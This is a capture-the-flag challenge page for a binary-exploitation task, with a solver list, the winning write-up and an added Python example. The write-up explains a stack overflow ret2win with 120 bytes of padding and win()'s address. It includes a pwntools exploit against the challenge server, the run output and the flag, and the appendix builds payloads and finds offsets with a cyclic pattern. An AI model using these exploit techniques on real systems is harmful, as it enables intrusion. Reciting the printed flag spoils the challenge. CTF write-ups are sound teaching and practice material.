
flag from wish

Category: Binary exploitation

Points: 90

Author: kolmus

Solves (93)

1. minipif (12/10 3:01 pm)
2. tudor (12/10 3:02 pm)
3. _vow_ (12/10 3:06 pm)
4. raul_26 (12/10 3:18 pm)
5. unpwnbl (12/10 3:27 pm)
6. boomanten10 (12/10 3:38 pm)
7. saturn9 (12/10 3:55 pm)
8. krississy (12/10 3:55 pm)
9. _avyra (12/10 4:06 pm)
10. mr_mph (12/10 4:23 pm)
11. pligonstein (12/10 4:28 pm)
12. Ricker Wilkes (12/10 4:46 pm)
13. p.s.y (12/10 5:22 pm)
14. whoful (12/10 6:06 pm)
15. .awesomeguy. (12/10 7:01 pm)
16. zarnex__ (12/10 9:55 pm)
17. eth007 (12/10 10:58 pm)
18. dailybee13. (12/11 12:18 am)
19. godlyavenger (12/11 12:22 am)
20. zzunaidd023 (12/11 1:31 am)
21. silence_ (12/11 2:04 am)
22. heartstoller (12/11 7:26 am)
23. theb4tmite (12/11 7:33 am)
24. kr4z31n (12/11 11:57 am)
25. _4n3s (12/11 5:18 pm)
26. battersea (12/11 6:28 pm)
27. booklover997 (12/11 11:05 pm)
28. Shrelic (12/12 9:36 am)
29. dharneesh5555 (12/12 9:47 am)
30. infernosalex (12/14 5:00 pm)
31. org_bener (12/15 1:59 am)
32. andreicat (12/15 5:52 am)
33. nouxia (12/15 6:09 am)
34. haha_96955 (12/15 12:00 pm)
35. hiushieud22 (12/15 12:04 pm)
36. ret2libc (12/15 7:19 pm)
37. _self (12/15 9:48 pm)
38. lzutao (12/16 2:02 am)
39. test123450604 (12/16 4:07 am)
40. genggx. (12/16 10:22 am)
41. enigma_likes_flags (12/16 11:32 am)
42. sleuth123 (12/16 6:19 pm)
43. f00var (12/17 1:35 am)
44. .hackboredzz (12/17 7:10 am)
45. gudaumoi12 (12/17 10:11 am)
46. colonneil (12/17 10:44 am)
47. cc.key (12/17 1:06 pm)
48. awdyan_ (12/17 5:10 pm)
49. trixai (12/17 5:53 pm)
50. elijah5399 (12/17 8:45 pm)
51. puwanai.s (12/17 10:28 pm)
52. andreww4364 (12/18 3:27 am)
53. monstermanyana_47633 (12/18 3:45 am)
54. damian.28 (12/18 2:09 pm)
55. athaw (12/18 7:27 pm)
56. fzhshzh_163 (12/19 3:50 am)
57. vuxnx_91621 (12/19 5:50 am)
58. ots3299 (12/19 6:43 am)
59. ryuun1corn (12/20 6:45 am)
60. jurf3889 (12/20 11:10 am)
61. 9emperor_84114_45259 (12/20 12:07 pm)
62. c9550 (12/20 12:52 pm)
63. naufalardhani (12/20 2:07 pm)
64. rex_i_a (12/21 1:36 pm)
65. manu7738 (12/21 8:40 pm)
66. rotzkokowski (12/22 8:40 am)
67. mtwiss_32447 (12/22 11:29 am)
68. .mindsystem (12/22 4:32 pm)
69. captainbl (12/23 7:39 am)
70. spectre06872 (12/23 7:47 am)
71. obet (12/23 8:12 am)
72. aquarhead (12/23 3:11 pm)
73. iam_the_tea_guy (12/23 3:49 pm)
74. re_tired (12/24 12:27 pm)
75. awwliveyet (12/25 4:57 am)
76. biggamer9000 (12/25 7:41 am)
77. fisher_8 (12/25 8:44 am)
78. mattewastaken (12/25 12:16 pm)
79. darkity (12/25 12:39 pm)
80. tildenjackson (12/25 6:21 pm)
81. grwna (12/26 1:23 am)
82. leyo7 (12/26 8:59 am)
83. tyx2019 (12/27 1:33 am)
84. fakeaviationist (12/27 3:13 am)
85. lcjly (12/27 3:21 am)
86. _vga_ (12/27 1:04 pm)
87. 0x0ffset (12/28 12:49 am)
88. hotiker (12/28 9:15 am)
89. hiu_hiu_nek (12/28 10:39 pm)
90. wilsonwei_cs (12/29 1:30 am)
91. siddhartha_hdk (12/29 4:50 am)
92. .jstr_ (12/29 5:08 am)
93. wtfpainn (12/29 12:59 pm)

Description

What is on your wish list this year? Be sure to tell Santa in great detail. He might have an early present or two in store for you!

nc ctf.csd.lol 4003

Attachments

Hint

There are no penalties for viewing hints. Hints are released 12 hours and 24 hours after the challenge releases.


Discuss this challenge with others in #🎄丨advent-of-ctf on our Discord server.

Write-up

zarnex's write-up was selected as the best write-up submitted for this challenge.

View this write-up on GitHub

So from initial glances I can tell that there is a win() function; this means we need to exploit something to get to win(). Also, looking at the decompilation, we see it reads in 256 bytes (0x100) without bounds checking, but var_78 is allocated with a smaller size of 100 bytes (0x64). This means we can overwrite var_78 by sending more than 100 bytes.

In CTFs we commonly call this a ret2win (pronounced "ret to win"), where the goal is to manipulate the value of RIP (Return Instruction Pointer) by overwriting it. So here is how we need to craft our payload:

  • First Part: Padding to reach the saved return address
  • Second Part: Overwrite the saved return address with the address of win()

But now we need to find the offset for the first part. Binary Ninja has the perfect feature for this!

As you can see, for the main() function the stack entry is at 0x78, which is 120. Now that we have our offset, we can start solving!

Below is the script I used to solve with comments.

from pwn import *  # Importing pwntools, an amazing library for ROP

io = remote("ctf.csd.lol", 4003)  # Specifying our remote (named io so it does not shadow pwntools' remote())

win_addr = 0x4011f6  # Address of win()

payload = b"A" * 120  # Sending the same amount of padding as our offset
payload += p64(win_addr)  # p64() "Converts an integer to a 64-bit little-endian representation."
io.recvuntil(b"enter your wish")  # Waiting until we get the input text saying "enter your wish" (bytes, so pwntools does not warn)
io.sendline(payload)  # Then sending after it
io.interactive()  # Spawning an interactive session afterwards

Running it we get...

$ /bin/python3 /home/zarnex/advent_of_ctf/flag_from_wish/solution.py
[+] Opening connection to ctf.csd.lol on port 4003: Done
/home/zarnex/advent_of_ctf/flag_from_wish/solution.py:9: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  remote.recvuntil("enter your wish") # Waiting until we get the input text saying enter your wish
[*] Switching to interactive mode
:
hmm ... I'm not sure I can grant that
maybe try again next year.
[DEBUG] returning to address: 0x4011f6
csd{Br0uGH7_t0_YOU_8y_W15H_D0t_CoM}
[*] Got EOF while reading in interactive
$

Nice, we got the flag! And looking at the debug line, we see it returned to the win() address, getting us our flag!

Flag: csd{Br0uGH7_t0_YOU_8y_W15H_D0t_CoM}
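As an added example that is not part of zarnex's write-up or the challenge's own code: the same ret2win construction in plain Python (struct instead of pwntools), with the offset recovered from a cyclic pattern instead of being read off Binary Ninja's stack view. The 120-byte distance from the buffer to the saved return address, the 0x100-byte read and win() at 0x4011f6 are taken from the write-up; the in-memory "frame" is a toy model for trying payloads offline, not the real process, and the ret-gadget option is a hypothetical extra for binaries where win() faults on a misaligned stack (this challenge did not need it).

```python
import struct

# Added example, not part of zarnex's write-up or the challenge files.
# Assumptions taken from the write-up: the binary reads 0x100 bytes into a
# buffer that starts 120 (0x78) bytes below the saved return address, and
# win() lives at 0x4011f6 (no PIE).
READ_SIZE = 0x100
BUF_TO_RET = 120
WIN_ADDR = 0x4011f6

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"


def _de_bruijn(alphabet, n):
    """Lazily yield a De Bruijn sequence over `alphabet` with window size n:
    every n-byte substring occurs exactly once per cycle, so any n bytes
    recovered from a crash pin down a single position in the pattern."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic(length, n=8, alphabet=ALPHABET):
    """First `length` bytes of the pattern (n=8 suits 64-bit saved registers)."""
    gen = _de_bruijn(alphabet, n)
    return bytes(next(gen) for _ in range(length))


def cyclic_find(value, n=8, alphabet=ALPHABET, max_len=4096):
    """Offset of the n-byte window that landed in a register after a crash.
    `value` may be the integer register value or raw bytes; returns -1 when
    it is not part of the pattern (e.g. the overflow never reached it)."""
    if isinstance(value, int):
        needle = struct.pack("<Q", value)[:n]
    else:
        needle = bytes(value)[:n]
    return cyclic(max_len, n, alphabet).find(needle)


def saved_rip_after(payload, buf_to_ret=BUF_TO_RET, read_size=READ_SIZE):
    """Toy model of the vulnerable frame (not real memory): `buf_to_ret` bytes
    of locals followed by the 8-byte saved return address. The unbounded read
    copies up to `read_size` bytes starting at the buffer."""
    frame = bytearray(buf_to_ret + 8)
    data = payload[:read_size]
    n = min(len(data), len(frame))
    frame[:n] = data[:n]
    return struct.unpack("<Q", frame[buf_to_ret:buf_to_ret + 8])[0]


def ret2win_payload(offset, win_addr, read_size=READ_SIZE, ret_gadget=None):
    """Padding up to the saved return address, then win()'s address.
    `ret_gadget` (hypothetical; not needed on this challenge) is the address
    of a lone `ret`, placed first when win() crashes on a misaligned stack
    (movaps): the extra pop restores 16-byte alignment before win() runs."""
    chain = b""
    if ret_gadget is not None:
        chain += struct.pack("<Q", ret_gadget)
    chain += struct.pack("<Q", win_addr)
    payload = b"A" * offset + chain
    if len(payload) > read_size:
        raise ValueError(
            f"payload is {len(payload)} bytes but the binary only reads {read_size}")
    return payload


def find_offset_from_crash(buf_to_ret=BUF_TO_RET):
    """End to end: feed the pattern into the modelled frame, read back what
    landed in the saved-RIP slot, and map it to an offset."""
    crashed_rip = saved_rip_after(cyclic(READ_SIZE), buf_to_ret)
    return cyclic_find(crashed_rip)


if __name__ == "__main__":
    offset = find_offset_from_crash()  # 120, matching Binary Ninja's 0x78
    payload = ret2win_payload(offset, WIN_ADDR)
    print(f"offset={offset} payload={len(payload)} bytes "
          f"-> saved rip=0x{saved_rip_after(payload):x}")
```

Against a live target the pattern step is the same, except the value comes from the crashed process (`info registers` in gdb, or the bytes at `rsp` when the `ret` faults on a non-canonical address) rather than from `saved_rip_after`; the length check in `ret2win_payload` is the one to keep, since a chain longer than what the binary reads is silently truncated.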

Need help with a challenge? Is a challenge broken? DM @ModMail in our Discord server.